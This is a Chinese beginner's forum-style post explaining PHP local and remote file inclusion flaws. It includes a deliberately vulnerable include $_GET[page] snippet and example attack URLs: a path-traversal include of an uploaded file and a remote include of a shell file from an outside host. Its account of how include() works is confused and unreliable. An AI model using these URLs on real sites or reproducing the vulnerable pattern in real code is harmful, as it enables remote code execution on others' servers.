用自己的话解释下吧,包含漏洞应该只是出在〔include(),require()和include_once(),require_once()〕这三个函数上的,每个函数的意思好象是说当判断当前文件或者执行当前函数的时候出错或者什么原因时,就执行下面语句,[因为程序员写程序的时候,不喜欢干同样的事情,也不喜欢把同样的代码(比如一些公用的函数)写几次,于是就把需要公用的代码写在一个单独的文件里面,比如 share.php,而后在其它文件进行包含调用]当下面语句恰好是程序远用以上3个函数调用某个文件的时候,这样恰恰就造成了远程包含漏洞! 其实吧 看过文章后,联想了下本地包含,感觉其实本地包含和远程包含其实可以说成是一样的!因为我想本地包含漏洞得具备俩条件,第一: 该套程序得有某个文件具备了包含漏洞(包含漏洞也可以查看本目录或者网站目录的所有文件的,只要知道路径,就可以一级一级跳)。那么既然可以看本地的文件,如果这个程序有上传,而你又上传了一个任意文件呢?举个例子:比如 一个论坛目录下的/test/ershao.php文件存在
程序代码
if ($_GET[page]) {
include $_GET[page];
} else {
include "home.php";
}
包含漏洞。然后我们去注册一个ID,然后发贴的时候传上一个附件
路径如:
http://www.xxx.com/bbs/uploa/img/8888888.txt OK ,然后用包含漏洞来调用这个文件,
格式:
http://www.xxx.com/bbs/test/ershao.php?page=../uploa/img/8888888.txt?
那么这样就构造出来了本地包含漏洞,如果不具备上传或没办法把自己想要上传的文件传上,
那就用远程包含,格式:
http://www.xxx.com/bbs/test/ershao.php?page=http://www.zhuangbi.cn/shell.txt?
这样就OK了!
推荐看下《包含文件漏洞详解》:
http://www.zhuangbi.cn/article.asp?id=175
因为第一次接触php ,什么都不懂,今天就用自己的话来描述下自己所理解
的意思,如果那点我说错了,或者理解错误,一定要提醒我,免的我错下去!
